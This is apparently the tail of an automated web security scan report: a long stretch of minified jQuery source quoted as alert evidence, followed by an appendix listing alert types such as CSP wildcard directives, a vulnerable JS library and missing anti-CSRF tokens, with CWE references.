t=e.stop;delete e.stop,t(n)};return"string"!=typeof e&&(n=t,t=e,e=void 0),t&&!1!==e&&this.queue(e||"fx",[]),this.each(function(){var t=!0,i=null!=e&&e+"queueHooks",o=w.timers,a=J.get(this);if(i)a[i]&&a[i].stop&&r(a[i]);else for(i in a)a[i]&&a[i].stop&&ot.test(i)&&r(a[i]);for(i=o.length;i--;)o[i].elem!==this||null!=e&&o[i].queue!==e||(o[i].anim.stop(n),t=!1,o.splice(i,1));!t&&n||w.dequeue(this,e)})},finish:function(e){return!1!==e&&(e=e||"fx"),this.each(function(){var t,n=J.get(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=w.timers,a=r?r.length:0;for(n.finish=!0,w.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;t<a;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),w.each(["toggle","show","hide"],function(e,t){var n=w.fn[t];w.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ut(t,!0),e,r,i)}}),w.each({slideDown:ut("show"),slideUp:ut("hide"),slideToggle:ut("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){w.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),w.timers=[],w.fx.tick=function(){var e,t=0,n=w.timers;for(nt=Date.now();t<n.length;t++)(e=n[t])()||n[t]!==e||n.splice(t--,1);n.length||w.fx.stop(),nt=void 0},w.fx.timer=function(e){w.timers.push(e),w.fx.start()},w.fx.interval=13,w.fx.start=function(){rt||(rt=!0,at())},w.fx.stop=function(){rt=null},w.fx.speeds={slow:600,fast:200,_default:400},w.fn.delay=function(t,n){return t=w.fx?w.fx.speeds[t]||t:t,n=n||"fx",this.queue(n,function(n,r){var i=e.setTimeout(n,t);r.stop=function(){e.clearTimeout(i)}})},function(){var e=r.createElement("input"),t=r.createElement("select").appendChild(r.createElement("option"));e.type="checkbox",h.checkOn=""!==e.value,h.optSelected=t.selected,(e=r.createElement("input")).value="t",e.type="radio",h.radioValue="t"===e.value}();var dt,ht=w.expr.attrHandle;w.fn.extend({attr:function(e,t){return z(this,w.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){w.removeAttr(this,e)})}}),w.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?w.prop(e,t,n):(1===o&&w.isXMLDoc(e)||(i=w.attrHooks[t.toLowerCase()]||(w.expr.match.bool.test(t)?dt:void 0)),void 0!==n?null===n?void w.removeAttr(e,t):i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAttribute(t,n+""),n):i&&"get"in i&&null!==(r=i.get(e,t))?r:null==(r=w.find.attr(e,t))?void 0:r)},attrHooks:{type:{set:function(e,t){if(!h.radioValue&&"radio"===t&&N(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},removeAttr:function(e,t){var n,r=0,i=t&&t.match(M);if(i&&1===e.nodeType)while(n=i[r++])e.removeAttribute(n)}}),dt={set:function(e,t,n){return!1===t?w.removeAttr(e,n):e.setAttribute(n,n),n}},w.each(w.expr.match.bool.source.match(/\w+/g),function(e,t){var n=ht[t]||w.find.attr;ht[t]=function(e,t,r){var i,o,a=t.toLowerCase();return r||(o=ht[a],ht[a]=i,i=null!=n(e,t,r)?a:null,ht[a]=o),i}});var gt=/^(?:input|select|textarea|button)$/i,yt=/^(?:a|area)$/i;w.fn.extend({prop:function(e,t){return z(this,w.prop,e,t,arguments.length>1)},removeProp:function(e){return this.each(function(){delete this[w.propFix[e]||e]})}}),w.extend({prop:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return 1===o&&w.isXMLDoc(e)||(t=w.propFix[t]||t,i=w.propHooks[t]),void 0!==n?i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:e[t]=n:i&&"get"in i&&null!==(r=i.get(e,t))?r:e[t]},propHooks:{tabIndex:{get:function(e){var t=w.find.attr(e,"tabindex");return t?parseInt(t,10):gt.test(e.nodeName)||yt.test(e.nodeName)&&e.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),h.optSelected||(w.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex)}}),w.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){w.propFix[this.toLowerCase()]=this});function vt(e){return(e.match(M)||[]).join(" ")}function mt(e){return e.getAttribute&&e.getAttribute("class")||""}function xt(e){return Array.isArray(e)?e:"string"==typeof e?e.match(M)||[]:[]}w.fn.extend({addClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).addClass(e.call(this,t,mt(this)))});if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])r.indexOf(" "+o+" ")<0&&(r+=o+" ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},removeClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).removeClass(e.call(this,t,mt(this)))});if(!arguments.length)return this.attr("class","");if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])while(r.indexOf(" "+o+" ")>-1)r=r.replace(" "+o+" "," ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},toggleClass:function(e,t){var n=typeof e,r="string"===n||Array.isArray(e);return"boolean"==typeof t&&r?t?this.addClass(e):this.removeClass(e):g(e)?this.each(function(n){w(this).toggleClass(e.call(this,n,mt(this),t),t)}):this.each(function(){var t,i,o,a;if(r){i=0,o=w(this),a=xt(e);while(t=a[i++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else void 0!==e&&"boolean"!==n||((t=mt(this))&&J.set(this,"__className__",t),this.setAttribute&&this.setAttribute("class",t||!1===e?"":J.get(this,"__className__")||""))})},hasClass:function(e){var t,n,r=0;t=" "+e+" ";while(n=this[r++])if(1===n.nodeType&&(" "+vt(mt(n))+" ").indexOf(t)>-1)return!0;return!1}});var bt=/\r/g;w.fn.extend({val:function(e){var t,n,r,i=this[0];{if(arguments.length)return r=g(e),this.each(function(n){var i;1===this.nodeType&&(null==(i=r?e.call(this,n,w(this).val()):e)?i="":"number"==typeof i?i+="":Array.isArray(i)&&(i=w.map(i,function(e){return null==e?"":e+""})),(t=w.valHooks[this.type]||w.valHooks[this.nodeName.toLowerCase()])&&"set"in t&&void 0!==t.set(this,i,"value")||(this.value=i))});if(i)return(t=w.valHooks[i.type]||w.valHooks[i.nodeName.toLowerCase()])&&"get"in t&&void 0!==(n=t.get(i,"value"))?n:"string"==typeof(n=i.value)?n.replace(bt,""):null==n?"":n}}}),w.extend({valHooks:{option:{get:function(e){var t=w.find.attr(e,"value");return null!=t?t:vt(w.text(e))}},select:{get:function(e){var t,n,r,i=e.options,o=e.selectedIndex,a="select-one"===e.type,s=a?null:[],u=a?o+1:i.length;for(r=o<0?u:a?o:0;r<u;r++)if(((n=i[r]).selected||r===o)&&!n.disabled&&(!n.parentNode.disabled||!N(n.parentNode,"optgroup"))){if(t=w(n).val(),a)return t;s.push(t)}return s},set:function(e,t){var n,r,i=e.options,o=w.makeArray(t),a=i.length;while(a--)((r=i[a]).selected=w.inArray(w.valHooks.option.get(r),o)>-1)&&(n=!0);return n||(e.selectedIndex=-1),o}}}}),w.each(["radio","checkbox"],function(){w.valHooks[this]={set:function(e,t){if(Array.isArray(t))return e.checked=w.inArray(w(e).val(),t)>-1}},h.checkOn||(w.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})}),h.focusin="onfocusin"in e;var wt=/^(?:focusinfocus|focusoutblur)$/,Tt=function(e){e.stopPropagation()};w.extend(w.event,{trigger:function(t,n,i,o){var a,s,u,l,c,p,d,h,v=[i||r],m=f.call(t,"type")?t.type:t,x=f.call(t,"namespace")?t.namespace.split("."):[];if(s=h=u=i=i||r,3!==i.nodeType&&8!==i.nodeType&&!wt.test(m+w.event.triggered)&&(m.indexOf(".")>-1&&(m=(x=m.split(".")).shift(),x.sort()),c=m.indexOf(":")<0&&"on"+m,t=t[w.expando]?t:new w.Event(m,"object"==typeof t&&t),t.isTrigger=o?2:3,t.namespace=x.join("."),t.rnamespace=t.namespace?new RegExp("(^|\\.)"+x.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,t.result=void 0,t.target||(t.target=i),n=null==n?[t]:w.makeArray(n,[t]),d=w.event.special[m]||{},o||!d.trigger||!1!==d.trigger.apply(i,n))){if(!o&&!d.noBubble&&!y(i)){for(l=d.delegateType||m,wt.test(l+m)||(s=s.parentNode);s;s=s.parentNode)v.push(s),u=s;u===(i.ownerDocument||r)&&v.push(u.defaultView||u.parentWindow||e)}a=0;while((s=v[a++])&&!t.isPropagationStopped())h=s,t.type=a>1?l:d.bindType||m,(p=(J.get(s,"events")||{})[t.type]&&J.get(s,"handle"))&&p.apply(s,n),(p=c&&s[c])&&p.apply&&Y(s)&&(t.result=p.apply(s,n),!1===t.result&&t.preventDefault());return t.type=m,o||t.isDefaultPrevented()||d._default&&!1!==d._default.apply(v.pop(),n)||!Y(i)||c&&g(i[m])&&!y(i)&&((u=i[c])&&(i[c]=null),w.event.triggered=m,t.isPropagationStopped()&&h.addEventListener(m,Tt),i[m](),t.isPropagationStopped()&&h.removeEventListener(m,Tt),w.event.triggered=void 0,u&&(i[c]=u)),t.result}},simulate:function(e,t,n){var r=w.extend(new w.Event,n,{type:e,isSimulated:!0});w.event.trigger(r,null,t)}}),w.fn.extend({trigger:function(e,t){return this.each(function(){w.event.trigger(e,t,this)})},triggerHandler:function(e,t){var n=this[0];if(n)return w.event.trigger(e,t,n,!0)}}),h.focusin||w.each({focus:"focusin",blur:"focusout"},function(e,t){var n=function(e){w.event.simulate(t,e.target,w.event.fix(e))};w.event.special[t]={setup:function(){var r=this.ownerDocument||this,i=J.access(r,t);i||r.addEventListener(e,n,!0),J.access(r,t,(i||0)+1)},teardown:function(){var r=this.ownerDocument||this,i=J.access(r,t)-1;i?J.access(r,t,i):(r.removeEventListener(e,n,!0),J.remove(r,t))}}});var Ct=e.location,Et=Date.now(),kt=/\?/;w.parseXML=function(t){var n;if(!t||"string"!=typeof t)return null;try{n=(new e.DOMParser).parseFromString(t,"text/xml")}catch(e){n=void 0}return n&&!n.getElementsByTagName("parsererror").length||w.error("Invalid XML: "+t),n};var St=/\[\]$/,Dt=/\r?\n/g,Nt=/^(?:submit|button|image|reset|file)$/i,At=/^(?:input|select|textarea|keygen)/i;function jt(e,t,n,r){var i;if(Array.isArray(t))w.each(t,function(t,i){n||St.test(e)?r(e,i):jt(e+"["+("object"==typeof i&&null!=i?t:"")+"]",i,n,r)});else if(n||"object"!==x(t))r(e,t);else for(i in t)jt(e+"["+i+"]",t[i],n,r)}w.param=function(e,t){var n,r=[],i=function(e,t){var n=g(t)?t():t;r[r.length]=encodeURIComponent(e)+"="+encodeURIComponent(null==n?"":n)};if(Array.isArray(e)||e.jquery&&!w.isPlainObject(e))w.each(e,function(){i(this.name,this.value)});else for(n in e)jt(n,e[n],t,i);return r.join("&")},w.fn.extend({serialize:function(){return w.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=w.prop(this,"elements");return e?w.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!w(this).is(":disabled")&&At.test(this.nodeName)&&!Nt.test(e)&&(this.checked||!pe.test(e))}).map(function(e,t){var n=w(this).val();return null==n?null:Array.isArray(n)?w.map(n,function(e){return{name:t.name,value:e.replace(Dt,"\r\n")}}):{name:t.name,value:n.replace(Dt,"\r\n")}}).get()}});var qt=/%20/g,Lt=/#.*$/,Ht=/([?&])_=[^&]*/,Ot=/^(.*?):[ \t]*([^\r\n]*)$/gm,Pt=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Mt=/^(?:GET|HEAD)$/,Rt=/^\/\//,It={},Wt={},$t="*/".concat("*"),Bt=r.createElement("a");Bt.href=Ct.href;function Ft(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(M)||[];if(g(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function _t(e,t,n,r){var i={},o=e===Wt;function a(s){var u;return i[s]=!0,w.each(e[s]||[],function(e,s){var l=s(t,n,r);return"string"!=typeof l||o||i[l]?o?!(u=l):void 0:(t.dataTypes.unshift(l),a(l),!1)}),u}return a(t.dataTypes[0])||!i["*"]&&a("*")}function zt(e,t){var n,r,i=w.ajaxSettings.flatOptions||{};for(n in t)void 0!==t[n]&&((i[n]?e:r||(r={}))[n]=t[n]);return r&&w.extend(!0,e,r),e}function Xt(e,t,n){var r,i,o,a,s=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),void 0===r&&(r=e.mimeType||t.getResponseHeader("Content-Type"));if(r)for(i in s)if(s[i]&&s[i].test(r)){u.unshift(i);break}if(u[0]in n)o=u[0];else{for(i in n){if(!u[0]||e.converters[i+" "+u[0]]){o=i;break}a||(a=i)}o=o||a}if(o)return o!==u[0]&&u.unshift(o),n[o]}function Ut(e,t,n,r){var i,o,a,s,u,l={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)l[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!u&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u=o,o=c.shift())if("*"===o)o=u;else if("*"!==u&&u!==o){if(!(a=l[u+" "+o]||l["* "+o]))for(i in l)if((s=i.split(" "))[1]===o&&(a=l[u+" "+s[0]]||l["* "+s[0]])){!0===a?a=l[i]:!0!==l[i]&&(o=s[0],c.unshift(s[1]));break}if(!0!==a)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(e){return{state:"parsererror",error:a?e:"No conversion from "+u+" to "+o}}}return{state:"success",data:t}}w.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:Ct.href,type:"GET",isLocal:Pt.test(Ct.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":$t,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":w.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?zt(zt(e,w.ajaxSettings),t):zt(w.ajaxSettings,e)},ajaxPrefilter:Ft(It),ajaxTransport:Ft(Wt),ajax:function(t,n){"object"==typeof t&&(n=t,t=void 0),n=n||{};var i,o,a,s,u,l,c,f,p,d,h=w.ajaxSetup({},n),g=h.context||h,y=h.context&&(g.nodeType||g.jquery)?w(g):w.event,v=w.Deferred(),m=w.Callbacks("once memory"),x=h.statusCode||{},b={},T={},C="canceled",E={readyState:0,getResponseHeader:function(e){var t;if(c){if(!s){s={};while(t=Ot.exec(a))s[t[1].toLowerCase()]=t[2]}t=s[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return c?a:null},setRequestHeader:function(e,t){return null==c&&(e=T[e.toLowerCase()]=T[e.toLowerCase()]||e,b[e]=t),this},overrideMimeType:function(e){return null==c&&(h.mimeType=e),this},statusCode:function(e){var t;if(e)if(c)E.always(e[E.status]);else for(t in e)x[t]=[x[t],e[t]];return this},abort:function(e){var t=e||C;return i&&i.abort(t),k(0,t),this}};if(v.promise(E),h.url=((t||h.url||Ct.href)+"").replace(Rt,Ct.protocol+"//"),h.type=n.method||n.type||h.method||h.type,h.dataTypes=(h.dataType||"*").toLowerCase().match(M)||[""],null==h.crossDomain){l=r.createElement("a");try{l.href=h.url,l.href=l.href,h.crossDomain=Bt.protocol+"//"+Bt.host!=l.protocol+"//"+l.host}catch(e){h.crossDomain=!0}}if(h.data&&h.processData&&"string"!=typeof h.data&&(h.data=w.param(h.data,h.traditional)),_t(It,h,n,E),c)return E;(f=w.event&&h.global)&&0==w.active++&&w.event.trigger("ajaxStart"),h.type=h.type.toUpperCase(),h.hasContent=!Mt.test(h.type),o=h.url.replace(Lt,""),h.hasContent?h.data&&h.processData&&0===(h.contentType||"").indexOf("application/x-www-form-urlencoded")&&(h.data=h.data.replace(qt,"+")):(d=h.url.slice(o.length),h.data&&(h.processData||"string"==typeof h.data)&&(o+=(kt.test(o)?"&":"?")+h.data,delete h.data),!1===h.cache&&(o=o.replace(Ht,"$1"),d=(kt.test(o)?"&":"?")+"_="+Et+++d),h.url=o+d),h.ifModified&&(w.lastModified[o]&&E.setRequestHeader("If-Modified-Since",w.lastModified[o]),w.etag[o]&&E.setRequestHeader("If-None-Match",w.etag[o])),(h.data&&h.hasContent&&!1!==h.contentType||n.contentType)&&E.setRequestHeader("Content-Type",h.contentType),E.setRequestHeader("Accept",h.dataTypes[0]&&h.accepts[h.dataTypes[0]]?h.accepts[h.dataTypes[0]]+("*"!==h.dataTypes[0]?", "+$t+"; q=0.01":""):h.accepts["*"]);for(p in h.headers)E.setRequestHeader(p,h.headers[p]);if(h.beforeSend&&(!1===h.beforeSend.call(g,E,h)||c))return E.abort();if(C="abort",m.add(h.complete),E.done(h.success),E.fail(h.error),i=_t(Wt,h,n,E)){if(E.readyState=1,f&&y.trigger("ajaxSend",[E,h]),c)return E;h.async&&h.timeout>0&&(u=e.setTimeout(function(){E.abort("timeout")},h.timeout));try{c=!1,i.send(b,k)}catch(e){if(c)throw e;k(-1,e)}}else k(-1,"No Transport");function k(t,n,r,s){var l,p,d,b,T,C=n;c||(c=!0,u&&e.clearTimeout(u),i=void 0,a=s||"",E.readyState=t>0?4:0,l=t>=200&&t<300||304===t,r&&(b=Xt(h,E,r)),b=Ut(h,b,E,l),l?(h.ifModified&&((T=E.getResponseHeader("Last-Modified"))&&(w.lastModified[o]=T),(T=E.getResponseHeader("etag"))&&(w.etag[o]=T)),204===t||"HEAD"===h.type?C="nocontent":304===t?C="notmodified":(C=b.state,p=b.data,l=!(d=b.error))):(d=C,!t&&C||(C="error",t<0&&(t=0))),E.status=t,E.statusText=(n||C)+"",l?v.resolveWith(g,[p,C,E]):v.rejectWith(g,[E,C,d]),E.statusCode(x),x=void 0,f&&y.trigger(l?"ajaxSuccess":"ajaxError",[E,h,l?p:d]),m.fireWith(g,[E,C]),f&&(y.trigger("ajaxComplete",[E,h]),--w.active||w.event.trigger("ajaxStop")))}return E},getJSON:function(e,t,n){return w.get(e,t,n,"json")},getScript:function(e,t){return w.get(e,void 0,t,"script")}}),w.each(["get","post"],function(e,t){w[t]=function(e,n,r,i){return g(n)&&(i=i||r,r=n,n=void 0),w.ajax(w.extend({url:e,type:t,dataType:i,data:n,success:r},w.isPlainObject(e)&&e))}}),w._evalUrl=function(e){return w.ajax({url:e,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,"throws":!0})},w.fn.extend({wrapAll:function(e){var t;return this[0]&&(g(e)&&(e=e.call(this[0])),t=w(e,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstElementChild)e=e.firstElementChild;return e}).append(this)),this},wrapInner:function(e){return g(e)?this.each(function(t){w(this).wrapInner(e.call(this,t))}):this.each(function(){var t=w(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=g(e);return this.each(function(n){w(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(e){return this.parent(e).not("body").each(function(){w(this).replaceWith(this.childNodes)}),this}}),w.expr.pseudos.hidden=function(e){return!w.expr.pseudos.visible(e)},w.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},w.ajaxSettings.xhr=function(){try{return new e.XMLHttpRequest}catch(e){}};var Vt={0:200,1223:204},Gt=w.ajaxSettings.xhr();h.cors=!!Gt&&"withCredentials"in Gt,h.ajax=Gt=!!Gt,w.ajaxTransport(function(t){var n,r;if(h.cors||Gt&&!t.crossDomain)return{send:function(i,o){var a,s=t.xhr();if(s.open(t.type,t.url,t.async,t.username,t.password),t.xhrFields)for(a in t.xhrFields)s[a]=t.xhrFields[a];t.mimeType&&s.overrideMimeType&&s.overrideMimeType(t.mimeType),t.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");for(a in i)s.setRequestHeader(a,i[a]);n=function(e){return function(){n&&(n=r=s.onload=s.onerror=s.onabort=s.ontimeout=s.onreadystatechange=null,"abort"===e?s.abort():"error"===e?"number"!=typeof s.status?o(0,"error"):o(s.status,s.statusText):o(Vt[s.status]||s.status,s.statusText,"text"!==(s.responseType||"text")||"string"!=typeof s.responseText?{binary:s.response}:{text:s.responseText},s.getAllResponseHeaders()))}},s.onload=n(),r=s.onerror=s.ontimeout=n("error"),void 0!==s.onabort?s.onabort=r:s.onreadystatechange=function(){4===s.readyState&&e.setTimeout(function(){n&&r()})},n=n("abort");try{s.send(t.hasContent&&t.data||null)}catch(e){if(n)throw e}},abort:function(){n&&n()}}}),w.ajaxPrefilter(function(e){e.crossDomain&&(e.contents.script=!1)}),w.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(e){return w.globalEval(e),e}}}),w.ajaxPrefilter("script",function(e){void 0===e.cache&&(e.cache=!1),e.crossDomain&&(e.type="GET")}),w.ajaxTransport("script",function(e){if(e.crossDomain){var t,n;return{send:function(i,o){t=w("<script>").prop({charset:e.scriptCharset,src:e.url}).on("load error",n=function(e){t.remove(),n=null,e&&o("error"===e.type?404:200,e.type)}),r.head.appendChild(t[0])},abort:function(){n&&n()}}}});var Yt=[],Qt=/(=)\?(?=&|$)|\?\?/;w.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Yt.pop()||w.expando+"_"+Et++;return this[e]=!0,e}}),w.ajaxPrefilter("json jsonp",function(t,n,r){var i,o,a,s=!1!==t.jsonp&&(Qt.test(t.url)?"url":"string"==typeof t.data&&0===(t.contentType||"").indexOf("application/x-www-form-urlencoded")&&Qt.test(t.data)&&"data");if(s||"jsonp"===t.dataTypes[0])return i=t.jsonpCallback=g(t.jsonpCallback)?t.jsonpCallback():t.jsonpCallback,s?t[s]=t[s].replace(Qt,"$1"+i):!1!==t.jsonp&&(t.url+=(kt.test(t.url)?"&":"?")+t.jsonp+"="+i),t.converters["script json"]=function(){return a||w.error(i+" was not called"),a[0]},t.dataTypes[0]="json",o=e[i],e[i]=function(){a=arguments},r.always(function(){void 0===o?w(e).removeProp(i):e[i]=o,t[i]&&(t.jsonpCallback=n.jsonpCallback,Yt.push(i)),a&&g(o)&&o(a[0]),a=o=void 0}),"script"}),h.createHTMLDocument=function(){var e=r.implementation.createHTMLDocument("").body;return e.innerHTML="<form></form><form></form>",2===e.childNodes.length}(),w.parseHTML=function(e,t,n){if("string"!=typeof e)return[];"boolean"==typeof t&&(n=t,t=!1);var i,o,a;return t||(h.createHTMLDocument?((i=(t=r.implementation.createHTMLDocument("")).createElement("base")).href=r.location.href,t.head.appendChild(i)):t=r),o=A.exec(e),a=!n&&[],o?[t.createElement(o[1])]:(o=xe([e],t,a),a&&a.length&&w(a).remove(),w.merge([],o.childNodes))},w.fn.load=function(e,t,n){var r,i,o,a=this,s=e.indexOf(" ");return s>-1&&(r=vt(e.slice(s)),e=e.slice(0,s)),g(t)?(n=t,t=void 0):t&&"object"==typeof t&&(i="POST"),a.length>0&&w.ajax({url:e,type:i||"GET",dataType:"html",data:t}).done(function(e){o=arguments,a.html(r?w("<div>").append(w.parseHTML(e)).find(r):e)}).always(n&&function(e,t){a.each(function(){n.apply(this,o||[e.responseText,t,e])})}),this},w.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){w.fn[t]=function(e){return this.on(t,e)}}),w.expr.pseudos.animated=function(e){return w.grep(w.timers,function(t){return e===t.elem}).length},w.offset={setOffset:function(e,t,n){var r,i,o,a,s,u,l,c=w.css(e,"position"),f=w(e),p={};"static"===c&&(e.style.position="relative"),s=f.offset(),o=w.css(e,"top"),u=w.css(e,"left"),(l=("absolute"===c||"fixed"===c)&&(o+u).indexOf("auto")>-1)?(a=(r=f.position()).top,i=r.left):(a=parseFloat(o)||0,i=parseFloat(u)||0),g(t)&&(t=t.call(e,n,w.extend({},s))),null!=t.top&&(p.top=t.top-s.top+a),null!=t.left&&(p.left=t.left-s.left+i),"using"in t?t.using.call(e,p):f.css(p)}},w.fn.extend({offset:function(e){if(arguments.length)return void 0===e?this:this.each(function(t){w.offset.setOffset(this,e,t)});var t,n,r=this[0];if(r)return r.getClientRects().length?(t=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:t.top+n.pageYOffset,left:t.left+n.pageXOffset}):{top:0,left:0}},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===w.css(r,"position"))t=r.getBoundingClientRect();else{t=this.offset(),n=r.ownerDocument,e=r.offsetParent||n.documentElement;while(e&&(e===n.body||e===n.documentElement)&&"static"===w.css(e,"position"))e=e.parentNode;e&&e!==r&&1===e.nodeType&&((i=w(e).offset()).top+=w.css(e,"borderTopWidth",!0),i.left+=w.css(e,"borderLeftWidth",!0))}return{top:t.top-i.top-w.css(r,"marginTop",!0),left:t.left-i.left-w.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent;while(e&&"static"===w.css(e,"position"))e=e.offsetParent;return e||be})}}),w.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,t){var n="pageYOffset"===t;w.fn[e]=function(r){return z(this,function(e,r,i){var o;if(y(e)?o=e:9===e.nodeType&&(o=e.defaultView),void 0===i)return o?o[t]:e[r];o?o.scrollTo(n?o.pageXOffset:i,n?i:o.pageYOffset):e[r]=i},e,r,arguments.length)}}),w.each(["top","left"],function(e,t){w.cssHooks[t]=_e(h.pixelPosition,function(e,n){if(n)return n=Fe(e,t),We.test(n)?w(e).position()[t]+"px":n})}),w.each({Height:"height",Width:"width"},function(e,t){w.each({padding:"inner"+e,content:t,"":"outer"+e},function(n,r){w.fn[r]=function(i,o){var a=arguments.length&&(n||"boolean"!=typeof i),s=n||(!0===i||!0===o?"margin":"border");return z(this,function(t,n,i){var o;return y(t)?0===r.indexOf("outer")?t["inner"+e]:t.document.documentElement["client"+e]:9===t.nodeType?(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});
          
          Evidence
          username
          Solution

          Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

Appendix

Alert types

This section contains additional information on the types of alerts in the report.

  1. CSP: Wildcard Directive

    Source raised by a passive scanner (CSP)
    CWE ID 693
    WASC ID 15
    Reference
    1. http://www.w3.org/TR/CSP2/
    2. http://www.w3.org/TR/CSP/
    3. http://caniuse.com/#search=content+security+policy
    4. http://content-security-policy.com/
    5. https://github.com/shapesecurity/salvation
    6. https://developers.google.com/web/fundamentals/security/csp#policy_applies_to_a_wide_variety_of_resources
  2. Vulnerable JS Library

    Source raised by a passive scanner (Vulnerable JS Library)
    CWE ID 829
    Reference
    1. https://github.com/twbs/bootstrap/issues/28236
  3. Absence of Anti-CSRF Tokens

    Source raised by a passive scanner (Absence of Anti-CSRF Tokens)
    CWE ID 352
    WASC ID 9
    Reference
    1. http://projects.webappsec.org/Cross-Site-Request-Forgery
    2. http://cwe.mitre.org/data/definitions/352.html
  4. Cross-Domain JavaScript Source File Inclusion

    Source raised by a passive scanner (Cross-Domain JavaScript Source File Inclusion)
    CWE ID 829
    WASC ID 15
  5. Incomplete or No Cache-control Header Set

